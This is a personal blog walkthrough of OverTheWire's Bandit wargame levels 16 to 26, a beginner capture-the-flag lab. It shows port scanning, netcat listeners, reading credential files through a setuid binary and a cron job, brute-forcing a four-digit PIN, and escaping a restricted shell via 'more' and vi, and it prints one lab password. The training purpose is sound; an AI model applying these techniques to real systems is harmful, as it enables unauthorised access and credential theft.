OverTheWire : Bandit

Capture.PNG

OverTheWire’s Bandit CTF is their lowest level capture the flag, and aimed at more of an intro to capturing the flag. It builds some good fundamentals and gives you hints, articles, and tool suggestions to capture the flag. Each “flag” you capture contains the password to the next level. You start (via SSH) as bandit0, you capture the flag, and that gives you the password to now login again (via ssh) as bandit1. You CTF your way up through level 27! From there you can move on to their next level of challenges.

*As stated in my first post, I decided half way through doing these to start blogging. Maybe at some point I’ll go back through and redo them, but at this point I do not plan on it. Enjoy!


Bandit : Level 16


 

Capture.PNG

So building off of level 14, I log in as bandit15 and the previously captured password. Sorry no cheating here ūüėČ . ¬†Reading up using the suggested tips of HEARTBEATING and R BLOCK, I find some interesting stuff.

I connect to the port using openssl.

 openssl s_client -connect melinda.labs.overthewire.org:30001

And as the Level Goal hints, I get the HEARTBEATING & R BLOCK at the end of the openssl session. **Hint, once you connect via SSL, there are no prompts but it appears to stop. Here paste or enter the previously captured password and hit enter. 

CaptureA quick Google search of heartbeating, returns “OpenSSL HEARTBLEED” which we all heard so much about the past year or so. From here I stumble upon a blog on how to test for heartbleed. You re-enter the same openssl connect command but add a -msg at the end to get more info. The following shows a complete heartbeat request.

 openssl s_client -connect melinda.labs.overthewire.org:30001 -msg

Running this command returns the following:

Capture.PNG

So this one did throw me for a loop. I sat and loomed here for a good hour. Sad, but true. One of the hints is to use -ign_eof. A quick Goolge Search of that returns 0, yes 0 results. How often does that happen!? So after another long while of saddness, I decided to just google ign and eof seperately. Google: linux ign   Google: linux eof.

I knew eof generally means End Of File, and ign, I had no idea but saw suggest results returned saying “ignore”. None of this made sense and I didn’t know where to use it. On a complete whim I re-ran my open SSL command and simple added -ign_eof, and again input the previously captured password (game 14).

openssl s_client -connect melinda.labs.overthewire.org:30001 -ign_eof

The results!?!?!?

Capture.PNG

I captured the flag, giving me the password to advance to the next level!

stock-vector-capture-the-flag-139895428

 

 


Bandit : Level 17


Level Goal

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

After reading over the Level Goal, I know we need to start with scanning ports. Thanks to my studying of the Penetration Testing : Introduction To Hacking by Georgia Weidman, I know this! I’m ready! So I run the following.¬†

nmap -sV melinda.labs.overthewire.org -p 31000-32000

-sV gives you a bit more information about the ports if it can, opposed to just telling you if they’re open / avaialble. The -p tells nmap to only worry about any ports in the range of 31000-32000. Nmap takes a minute to scan and returns the following:

Capture.PNG

This lets us know that in the range of 31000-32000 the ports 31046, 31518, 31691, 31790, and 31960 are open. Unfortunately nmap isn’t able to give us any addtional info based on this scan and parameters, but does tell us that 3 of the ports services are “echo” meaning anything we type or throw at it we know it will just echo (repeat) back to us. So this narrows it down to 2 ports, 31518 & 31790.

I start by trying to connect via openssl to see if it’s that simple, and we just then enter our current captured password as in the previous challenge?

openssl s_client -connect melinda.labs.overthewire.org:31518

It gets to the password prompt!!! I enter the password . . . .and it’s echo’d back to me.

So I try again this time using port 31790, I get a password prompt . . . . and we’re returned a SSH private key!

Capture.PNG

And thanks to prior exercises, we already know what to do with this! I first find a writeable directory, in my case /tmp/. I create a blank key file via touch bandit17.key  and open it with nano. I paste the key contents, save, and quit.

Now admittedly fresh of the openssl I attempted to connect and got multiple errors trying to specify the key file, then I remembered the keyfile was specified in the prior CTF with SSH. So, I give up on openssl, and try via SSH.

ssh -i /tmp/bandit17.key bandit17@melinda.labs.overthewire.o

And it connects, however, it still prompts for a password? So I scroll up and read through the connect messages to see a line that says:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@ WARNING: UNPROTECTED PRIVATE KEY FILE! @@@@@@@@@@@
Permissions 0664 for ‘/tmp/bandit17.key’ are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /tmp/bandit17.key
bandit17@melinda.labs.overthewire.org’s password:

So I Google “ssl private key permissions too open” which immediately returns this StackOverflow page with a chmod command. So I run:

chmod 400 /tmp/bandit17.key

I rerun my SSH command and specify my new key file, and once again we’re in! Command line confirms we’re bandit17@melinda.

stock-vector-capture-the-flag-139895428

 

 

 


Bandit : Level 18


Level Goal

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new

NOTE: if you have solved this level and see ‚ÄėByebye!‚Äô when trying to log into bandit18, this is related to the next level, bandit19

So simple enough? Compare two files, and see what I get.
diff passwords.old passwords.net
Comparing the files returns 2 different lines, so I take note of both. Since I had the 2nd one already copied I attempt to use it and get access denied. I try the first line and receive a “Byebye!” So per the hint, that should mean we’ve completed it and need to move on to the next level.

Bandit : Level 19


Level Goal

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

 

This one was interesting, and taught me something new. So I went to start a new putty session and SSH in as Bandit18. This immediately exited the session, which made sense as the previous Level (17) said if you’re getting Byebye! move on. So the hint says someone has modified the .bashrc to log you out when you connect via ssh. I immediately look at the .bashrc, and nothing jumps out at me. A quick google search shows a few posts, one say “Crap I put an exit in the bashrc and now cannot login remote.” One user suggested and apparently it worked, but you can CTRL+C during the connection to disconnect the script. But for me it didn’t work, or I wasn’t fast enough.

But scrolling through a bit more I came across this post HERE.¬†The author is asking how to not run the bashrc script when guest users logon to restrict certain functions. I was assuming this wouldn’t work and also assumed it was a built in mandatory requirement. Well to my surprise I was wrong. I ran with the second suggested command in the answer and ran:

ssh bandit18@melinda.labs.overthewire.org “bash –noprofile –norc”

This tells SSH to connect and to essentially not load the default profile which in our case runs the bash.rc.¬†Running the above command left me with no indication of success or failure. I hit enter, just adds another blank line. So I ran “whoami”

Capture

And there we go! Another flag captured.

stock-vector-capture-the-flag-139895428

 

 


Bandit : Level 20


Level Goal

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.

 

Level 19, start! I login as bandit19 using our password we just captured. The directions say to use the setuid binary in the home directory. I do an ls which shows us a “bandit20-do”¬†I run that

./bandit20-do
Run a command as another user.
Example: ./bandit20-do id

OK, simple enough?

./bandit20-do cat /etc/bandit_pass/bandit20

And the password is ours!

 

stock-vector-capture-the-flag-139895428

 

 

 

 


Bandit : Level 21


Level Goal

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think

OK. . . . I’d be lying if I said I didn’t have to re-read this 100 times. For some reason it just kept going right over my head. I knew I needed to start a listener, but wasn’t sure what I needed to do. Unfortunately during my Google sessions, I stumbled across the a very helpful hint. I almost feel guilty about it, so no captured flag man this time.

But in essence in you need to putty windows open and then run the following.

Start a netcat listener on a port of your choice on the first putty session.

nc -l 32111

Now run the setuid program on the second.

./suconnect 32111

And you should see the nc listener in your first session display the password.

 

 


Bandit : Level 22


Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in/etc/cron.d/ for the configuration and see what command is being executed.

 

First thing I did was navigate to /etc/cron.d/ as suggested. I did some reading on the cron manual pages. I did some Google fu on crontab. And then kept it simple. I ran a ls -l which returned a bunch of files, but most importablty I noticed:

-rw-r–r– 1 root root ¬†61 Nov 14 ¬†2014 cronjob_bandit22

And knowing we’re trying to move on to level 22, I figured that’s a good place to start. a quick CAT of the file returns the folllowing:

#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

So I then ls -l the file which shows bandit21 (us currently) has permission to access the file! Next a CAT of /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv which returns the password file.

Coming off a cheap victory an easy one was needed and small boost of confidence.

stock-vector-capture-the-flag-139895428

 

 

 

 


Bandit : Level 23


Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in/etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

 

Based on the provided goal, it seems like we’re headed back to /etc/cron.d. Coming off the last level, I immediately CAT the cronjob_bandit23 (next level) and get:

* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null

Again I CAT the script receiving the following:

bandit22@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ‘ ‘ -f 1)

echo “Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget”

cat /etc/bandit_pass/$myname > /tmp/$mytarget

Because the level says it’s important to learn to read other people’s scripts, I make sure to thoroughly look it over and understand all the components.

I know the first line sets what shell to run the script in.

#!/bin/bash

I know the 2nd line is creating the variable $myname which will contain bandi22

myname=$(whoami)

The 3rd line¬†I’m fairly certain is setting the variable $mytarget to an MD5SUM by piping “echo I am user $myname” into md5sum and creating a hash that is then cut at the first blank space. And from reading the cut manual pages, it appears the -f 1¬†designates the field to drop.

mytarget=$(echo I am user $myname | md5sum | cut -d ‘ ‘ -f 1)

Finally the following lines print to the screen (echo) the path to where the $mytarget variable is, and the cat line actually prints the password to the file.

echo “Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget”

cat /etc/bandit_pass/$myname > /tmp/$mytarget

From there we have the password and victory is ours!

stock-vector-capture-the-flag-139895428

 

 

 


Bandit : Level 24


Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in/etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

***Note РI found after spending way to much time on this, there are some issues with this lab. Remember all others using these labs have access and can unfortunately make unwanted changes. 

OK, so this one had me stumped! Being a novice at shell scripting but understand how to script, I figured this would be a piece of cake. Based on previous labs, I know that inside /etc/cron.d there will be some script called bandit24. Sure enough there was!

I cat the /etc/cron.d/cronjob_bandit24 and get

* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

Which then I take a look at /usr/bin/cronjob_bandit24.sh and get

#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo “Executing and deleting all scripts in /var/spool/$myname:”
for i in * .*;
do
if [ “$i” != “.” -a “$i” != “..” ];
then
echo “Handling $i”
timeout -s 9 60 “./$i”
rm -f “./$i”
fi
done

So taking a look at this script it changes directories to /var/spool/bandit24 (while whoami would produce bandit23, it’s run by the bandit24 user). From here it executes all scripts and deletes them after.

Going off of previous challenges I write a script in /var/spool/bandit24 called getpass.sh. Inside of getpass.sh I put

#!/bin/bash

cat /etc/bandit_pass/bandit24 >> /tmp/banditpass24/password.txt

I chmod 777 the file and wait for it too run! After a few ls I noticed the directory is empty and I navigate to /tmp/banditpass24/password.txt. . . . . the file is empty. Thinking it was me I toyed around with this on and off for the past 2 days. After admitting defeat, I looked up the solution.

I was completely surprised to find similar solutions as mine! So I review my original script and run it again, same result. I research other solutions and have the same result with each tutorial I read. ¬†. . . . no password. During one tutorial I actually stumbled across their directory, their script, and their password.txt. I tried their script, renamed the .txt file, and still NO PASSWORD! After more research I finally found a few blog posts where people recently said they’ve had the same issue and reached out to mods. I jumped on IRC and let them know their as well! I feel good knowing my script should have worked, but bummed I spent 2 days on this :\ Oh well!

 

stock-vector-capture-the-flag-139895428

 

 


Bandit : Level 25


Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

 

OK – seems easy? All we need to do is use the previous password (check) plus 4 digits 0000 – 9999 (check). So I did take sometime to see if there were any tools in Kali or such that would accept the word and add the numbers. I found stuff such as curl, cewl, and others but figured that was probably more than what this was looking for.

So I decided to write a bash script to do this. Admittedly I struggled with writing this. Coming from a heavy Windows background I knew how batch worked, but couldn’t easily translate that in bash. I’ll have to revisit this in bash.

But, I decided to write the following in Windows.

set try=0
set pass=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

:LOOP

IF %try%==9999 EXIT

set /a try=%try%+1

echo %pass% %try% >> wordlist.txt

GOTO :LOOP

I then notepad’d the file and removed all lines with less than 4 characters. I’m sure there are hundreds of other ways, but I didn’t do that this round.

I then created a file in our lab and copied and pasted from my computer to the ssh session into a file called wordlist.txt. Going off of previously learned techniques I used netcat and piped the password file in.

nc melinda.labs.overthewire.org 30002 < wordlist.xt

After a brief moment I was presented with the password.

Capture.PNG

I’ll have to revisit this when I finish the bandit exercises and and port my batch script to bash. While I still achieved the same goal, what would I have done if I didn’t have access to windows?

stock-vector-capture-the-flag-139895428

 

 


Bandit : Level 26


Level Goal

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

 

On to the final level! I login as bandit25, and run ls to see what we have. And sure enough we have a bandit26.sshkey  in our home directory.

ssh -i bandit26.sshkey bandit26@melinda.labs.org

 

And we’re in!!!!! A few minutes later, I realize I never made it to bandit26 and after SSH login it drops us back down to bandit25. I did some further reading up on scripts and breaking out. I actually found a few things about trying to pause or break the script as it’s running during login, but just as the last lab I tried that, no luck.

During research I found that /etc/passwd contains all users that have access to the system. So I ran a

cat /etc/passwd | grep bandit26

which returned

bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

a look at that reveals

bandit25@melinda:~$ cat /usr/bin/showtext
#!/bin/sh

more ~/text.txt
exit 0

To be honest, I had no idea what to do with this information! A google search of more ~/text.txt didn’t return anything. And reading up on more didn’t help. I was familiar with the command but didn’t understand how it played in to this challenge.

After lots of google searching I stumbled upon a similar challenge which gave me the answer ;( ¬†. This now happened to me twice over the course of these 26 labs, but I can say overall I’m pleased with how I’ve done and have learned quite a bit.

@@@@@@@@@@@@@@@@@@@

SPOILER

@@@@@@@@@@@@@@@@@@@

But I’m assuming if you’re doing these challenges and reading these, you’ve been spoiled all along.

The key to this challenge was to shrink your SSH window down to one or two lines and login via SSH. This causes the script to pause, and require enter, space, etc to move on. If you instead hit “v” while in more of a file, it allows you to open it in Vi to edit it. Once I got here, I was familiar with other commands and ran a :R /etc/bandit_pass/bandit26 which then return the password for the final level on the screen.

 

 


Bandit : Review


Overall I was really pleased with these challenges. It definitely built up some skills and got me to look at problems in new ways. And most of all, it got me interested in doing even more challenges like this and attempting challenges such as VMs from vulnhub. I’ll be moving on to Over The Wire’s Natas, which from a brief look appears to be mostly web based stuff which I could use some work on as well.

If you’re looking for a an easy’ish way to get familiar with navigation and Linux commands this is a great place to start! The levels for the part are at a beginner/intro level. They give great hints and really boost your confidence as you move through the levels. It would be great to see them add more to this down the line.

Thanks for following along!

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s